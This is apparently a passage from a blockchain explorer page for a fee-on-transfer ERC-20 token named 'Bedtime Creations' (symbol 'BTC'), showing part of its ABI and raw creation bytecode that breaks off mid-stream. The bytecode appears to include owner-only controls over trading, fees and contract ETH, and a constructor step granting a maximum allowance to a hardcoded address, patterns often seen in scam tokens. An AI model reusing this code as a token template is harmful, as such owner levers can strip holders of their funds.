{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTx","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c06040526001600b5f6101000a81548160ff0219169083151502179055505f600b60016101000a81548160ff0219169083151502179055505f600b60026101000a81548160ff02191690831515021790555034801561005d575f80fd5b506040518060400160405280601181526020017f42656474696d65204372656174696f6e730000000000000000000000000000008152506040518060400160405280600381526020017f425443000000000000000000000000000000000000000000000000000000000081525081600390816100d99190610ee0565b5080600490816100e99190610ee0565b5050505f6100fb61063160201b60201c565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3505f737a250d5630b4cf539739df2c5dacb4c659f2488d905073c0864382970b67892de52b318bc39ad5f00f84e660065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503360075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061025581600161063860201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250505f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505f8273ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156102f8573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061031c919061100d565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308573ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610381573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906103a5919061100d565b6040518363ffffffff1660e01b81526004016103c2929190611047565b6020604051808303815f875af11580156103de573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610402919061100d565b90508073ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff168152505061044b60a051600161063860201b60201c565b61045e60a051600161072c60201b60201c565b6104a46040518060400160405280600581526020017f626c6f636b00000000000000000000000000000000000000000000000000000081525082846107ca60201b60201c565b5f600590505f805f600f90505f805f67016345785d8a000090506103e86014826104ce919061109b565b6104d89190611109565b6008819055506103e86014826104ee919061109b565b6104f89190611109565b600a8190555061271060058261050e919061109b565b6105189190611109565b60098190555086600d8190555085600e8190555084600f81905550600f54600e54600d546105469190611139565b6105509190611139565b600c8190555083601181905550826012819055508160138190555060135460125460115461057e9190611139565b6105889190611139565b6010819055506105ac61059f61094860201b60201c565b600161097060201b60201c565b6105bd30600161097060201b60201c565b6105d061dead600161097060201b60201c565b6105ee6105e161094860201b60201c565b600161063860201b60201c565b6105ff30600161063860201b60201c565b61061261dead600161063860201b60201c565b6106223082610ab260201b60201c565b5050505050505050505061142b565b5f33905090565b61064661063160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146106d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106cb906111c6565b60405180910390fd5b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b8060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610838576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082f90611254565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161089d906112e2565b60405180910390fd5b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61097e61063160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a0c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a03906111c6565b60405180910390fd5b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051610aa6919061131a565b60405180910390a25050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b179061137d565b60405180910390fd5b610b315f8383610c4460201b60201c565b610b4681600254610c4960201b90919060201c565b600281905550610b9b815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610c4960201b90919060201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c3891906113aa565b60405180910390a35050565b505050565b5f808284610c579190611139565b905083811015610c9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c939061140d565b60405180910390fd5b8091505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610d2157607f821691505b602082108103610d3457610d33610cdd565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302610d967fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610d5b565b610da08683610d5b565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f610de4610ddf610dda84610db8565b610dc1565b610db8565b9050919050565b5f819050919050565b610dfd83610dca565b610e11610e0982610deb565b848454610d67565b825550505050565b5f90565b610e25610e19565b610e30818484610df4565b505050565b5b81811015610e5357610e485f82610e1d565b600181019050610e36565b5050565b601f821115610e9857610e6981610d3a565b610e7284610d4c565b81016020851015610e81578190505b610e95610e8d85610d4c565b830182610e35565b50505b505050565b5f82821c905092915050565b5f610eb85f1984600802610e9d565b1980831691505092915050565b5f610ed08383610ea9565b9150826002028217905092915050565b610ee982610ca6565b67ffffffffffffffff811115610f0257610f01610cb0565b5b610f0c8254610d0a565b610f17828285610e57565b5f60209050601f831160018114610f48575f8415610f36578287015190505b610f408582610ec5565b865550610fa7565b601f198416610f5686610d3a565b5f5b82811015610f7d57848901518255600182019150602085019450602081019050610f58565b86831015610f9a5784890151610f96601f891682610ea9565b8355505b6001600288020188555050505b505050505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610fdc82610fb3565b9050919050565b610fec81610fd2565b8114610ff6575f80fd5b50565b5f8151905061100781610fe3565b92915050565b5f6020828403121561102257611021610faf565b5b5f61102f84828501610ff9565b91505092915050565b61104181610fd2565b82525050565b5f60408201905061105a5f830185611038565b6110676020830184611038565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6110a582610db8565b91506110b083610db8565b92508282026110be81610db8565b915082820484148315176110d5576110d461106e565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61111382610db8565b915061111e83610db8565b92508261112e5761112d6110dc565b5b828204905092915050565b5f61114382610db8565b915061114e83610db8565b92508282019050808211156111665761116561106e565b5b92915050565b5f82825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6111b060208361116c565b91506111bb8261117c565b602082019050919050565b5f6020820190508181035f8301526111dd816111a4565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61123e60248361116c565b9150611249826111e4565b604082019050919050565b5f6020820190508181035f83015261126b81611232565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6112cc60228361116c565b91506112d782611272565b604082019050919050565b5f6020820190508181035f8301526112f9816112c0565b9050919050565b5f8115159050919050565b61131481611300565b82525050565b5f60208201905061132d5f83018461130b565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f611367601f8361116c565b915061137282611333565b602082019050919050565b5f6020820190508181035f8301526113948161135b565b9050919050565b6113a481610db8565b82525050565b5f6020820190506113bd5f83018461139b565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f6113f7601b8361116c565b9150611402826113c3565b602082019050919050565b5f6020820190508181035f830152611424816113eb565b9050919050565b60805160a051613bc461146f5f395f610c3201525f8181610a6f0152818161101d0152818161104501528181612a6701528181612b460152612b6d0152613bc45ff3fe608060405260043610610254575f3560e01c80638ea5220f11610138578063c0246668116100b5578063e2f4560511610079578063e2f45605146108bd578063f11a24d3146108e7578063f2fde38b14610911578063f637434214610939578063f88de0c314610963578063f8b45b05146109795761025b565b8063c0246668146107dd578063c8c8ebe414610805578063d4c989d31461082f578063d85ba06314610857578063dd62ed3e146108815761025b565b8063a0d82dc5116100fc578063a0d82dc5146106d5578063a457c2d7146106ff578063a9059cbb1461073b578063b62496f514610777578063bbc0c742146107b35761025b565b80638ea5220f14610603578063921369131461062d57806395d89b41146106575780639c3b4fdc146106815780639fccce32146106ab5761025b565b806349bd5a5e116101d1578063715018a611610195578063715018a61461052f578063751039fc1461054557806375f0a8741461056f5780637bce5a04146105995780638a8c523c146105c35780638da5cb5b146105d95761025b565b806349bd5a5e1461044b5780634a62bb65146104755780636a486a8e1461049f5780636ddd1713146104c957806370a08231146104f35761025b565b80631a8145bb116102185780631a8145bb146103555780631f3fed8f1461037f57806323b872dd146103a9578063313ce567146103e5578063395093511461040f5761025b565b806306fdde031461025f578063095ea7b31461028957806310d5de53146102c55780631694505e1461030157806318160ddd1461032b5761025b565b3661025b57005b5f80fd5b34801561026a575f80fd5b506102736109a3565b6040516102809190612cce565b60405180910390f35b348015610294575f80fd5b506102af60048036038101906102aa9190612d7f565b610a33565b6040516102bc9190612dd7565b60405180910390f35b3480156102d0575f80fd5b506102eb60048036038101906102e69190612df0565b610a50565b6040516102f89190612dd7565b60405180910390f35b34801561030c575f80fd5b50610315610a6d565b6040516103229190612e76565b60405180910390f35b348015610336575f80fd5b5061033f610a91565b60405161034c9190612e9e565b60405180910390f35b348015610360575f80fd5b50610369610a9a565b6040516103769190612e9e565b60405180910390f35b34801561038a575f80fd5b50610393610aa0565b6040516103a09190612e9e565b60405180910390f35b3480156103b4575f80fd5b506103cf60048036038101906103ca9190612eb7565b610aa6565b6040516103dc9190612dd7565b60405180910390f35b3480156103f0575f80fd5b506103f9610b7a565b6040516104069190612f22565b60405180910390f35b34801561041a575f80fd5b5061043560048036038101906104309190612d7f565b610b82565b6040516104429190612dd7565b60405180910390f35b348015610456575f80fd5b5061045f610c30565b60405161046c9190612f4a565b60405180910390f35b348015610480575f80fd5b50610489610c54565b6040516104969190612dd7565b60405180910390f35b3480156104aa575f80fd5b506104b3610c66565b6040516104c09190612e9e565b60405180910390f35b3480156104d4575f80fd5b506104dd610c6c565b6040516104ea9190612dd7565b60405180910390f35b3480156104fe575f80fd5b5061051960048036038101906105149190612df0565b610c7f565b6040516105269190612e9e565b60405180910390f35b34801561053a575f80fd5b50610543610cc4565b005b348015610550575f80fd5b50610559610e17565b6040516105669190612dd7565b60405180910390f35b34801561057a575f80fd5b50610583610f06565b6040516105909190612f4a565b60405180910390f35b3480156105a4575f80fd5b506105ad610f2b565b6040516105ba9190612e9e565b60405180910390f35b3480156105ce575f80fd5b506105d7610f31565b005b3480156105e4575f80fd5b506105ed611132565b6040516105fa9190612f4a565b60405180910390f35b34801561060e575f80fd5b5061061761115a565b6040516106249190612f4a565b60405180910390f35b348015610638575f80fd5b5061064161117f565b60405161064e9190612e9e565b60405180910390f35b348015610662575f80fd5b5061066b611185565b6040516106789190612cce565b60405180910390f35b34801561068c575f80fd5b50610695611215565b6040516106a29190612e9e565b60405180910390f35b3480156106b6575f80fd5b506106bf61121b565b6040516106cc9190612e9e565b60405180910390f35b3480156106e0575f80fd5b506106e9611221565b6040516106f69190612e9e565b60405180910390f35b34801561070a575f80fd5b5061072560048036038101906107209190612d7f565b611227565b6040516107329190612dd7565b60405180910390f35b348015610746575f80fd5b50610761600480360381019061075c9190612d7f565b6112ef565b60405161076e9190612dd7565b60405180910390f35b348015610782575f80fd5b5061079d60048036038101906107989190612df0565b61130c565b6040516107aa9190612dd7565b60405180910390f35b3480156107be575f80fd5b506107c7611329565b6040516107d49190612dd7565b60405180910390f35b3480156107e8575f80fd5b5061080360048036038101906107fe9190612f8d565b61133c565b005b348015610810575f80fd5b50610819611478565b6040516108269190612e9e565b60405180910390f35b34801561083a575f80fd5b5061085560048036038101906108509190612f8d565b61147e565b005b348015610862575f80fd5b5061086b61156c565b6040516108789190612e9e565b60405180910390f35b34801561088c575f80fd5b506108a760048036038101906108a29190612fcb565b611572565b6040516108b49190612e9e565b60405180910390f35b3480156108c8575f80fd5b506108d16115f4565b6040516108de9190612e9e565b60405180910390f35b3480156108f2575f80fd5b506108fb6115fa565b6040516109089190612e9e565b60405180910390f35b34801561091c575f80fd5b5061093760048036038101906109329190612df0565b611600565b005b348015610944575f80fd5b5061094d6117c2565b60405161095a9190612e9e565b60405180910390f35b34801561096e575f80fd5b506109776117c8565b005b348015610984575f80fd5b5061098d61188e565b60405161099a9190612e9e565b60405180910390f35b6060600380546109b290613036565b80601f01602080910402602001604051908101604052809291908181526020018280546109de90613036565b8015610a295780601f10610a0057610100808354040283529160200191610a29565b820191905f5260205f20905b815481529060010190602001808311610a0c57829003601f168201915b5050505050905090565b5f610a46610a3f611894565b848461189b565b6001905092915050565b6018602052805f5260405f205f915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f600254905090565b60155481565b60145481565b5f610ab2848484611a5e565b610b6f84610abe611894565b610b6a85604051806060016040528060288152602001613b426028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b21611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b600190509392505050565b5f6009905090565b5f610c26610b8e611894565b84610c218560015f610b9e611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b61189b565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b600b5f9054906101000a900460ff1681565b60105481565b600b60029054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610ccc611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d51906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f610e20611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea5906130b0565b60405180910390fd5b5f600b5f6101000a81548160ff0219169083151502179055505f600c819055505f600d819055505f600e819055505f600f819055505f6010819055505f6011819055505f6012819055505f6013819055506001905090565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d5481565b610f39611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbe906130b0565b60405180910390fd5b600b60019054906101000a900460ff1615611017576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100e90613118565b60405180910390fd5b611043307f00000000000000000000000000000000000000000000000000000000000000005f1961189b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719473061108a30610c7f565b5f80611094611132565b426040518863ffffffff1660e01b81526004016110b69695949392919061316f565b60606040518083038185885af11580156110d2573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906110f791906131e2565b5050506001600b60016101000a81548160ff0219169083151502179055506001600b60026101000a81548160ff021916908315150217905550565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b60606004805461119490613036565b80601f01602080910402602001604051908101604052809291908181526020018280546111c090613036565b801561120b5780601f106111e25761010080835404028352916020019161120b565b820191905f5260205f20905b8154815290600101906020018083116111ee57829003601f168201915b5050505050905090565b600f5481565b60165481565b60135481565b5f6112e5611233611894565b846112e085604051806060016040528060258152602001613b6a6025913960015f61125c611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b6001905092915050565b5f6113026112fb611894565b8484611a5e565b6001905092915050565b6019602052805f5260405f205f915054906101000a900460ff1681565b600b60019054906101000a900460ff1681565b611344611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146113d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c9906130b0565b60405180910390fd5b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161146c9190612dd7565b60405180910390a25050565b60085481565b611486611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611514576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150b906130b0565b60405180910390fd5b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b600c5481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60095481565b600e5481565b611608611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611704576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116fb906132a2565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a38060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60125481565b6117d0611132565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611806575f80fd5b5f4711611848576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161183f9061330a565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f1935050505015801561188b573d5f803e3d5ffd5b50565b600a5481565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611909576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190090613398565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611977576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196e90613426565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611a519190612e9e565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611acc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac3906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b3190613542565b60405180910390fd5b5f8103611b5157611b4c83835f6125ac565b6124e8565b600b5f9054906101000a900460ff161561203557611b6d611132565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bdb5750611bab611132565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c1357505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c4d575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c665750600560149054906101000a900460ff16155b1561203457600b60019054906101000a900460ff16611d5a5760175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611d1a575060175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611d59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d50906135aa565b60405180910390fd5b5b60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611df7575060185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611e9e57600854811115611e41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e3890613638565b60405180910390fd5b600a54611e4d83610c7f565b82611e589190613683565b1115611e99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e9090613700565b60405180910390fd5b612033565b60195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611f3b575060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f8a57600854811115611f85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f7c9061378e565b60405180910390fd5b612032565b60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661203157600a54611fe483610c7f565b82611fef9190613683565b1115612030576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161202790613700565b60405180910390fd5b5b5b5b5b5b5f61203f30610c7f565b90505f8082101590508080156120615750600b60029054906101000a900460ff165b801561207a5750600560149054906101000a900460ff16155b80156120cd575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612120575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612173575060175f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156121b7576001600560146101000a81548160ff02191690831515021790555061219c83612835565b5f600560146101000a81548160ff0219169083151502179055505b5f6005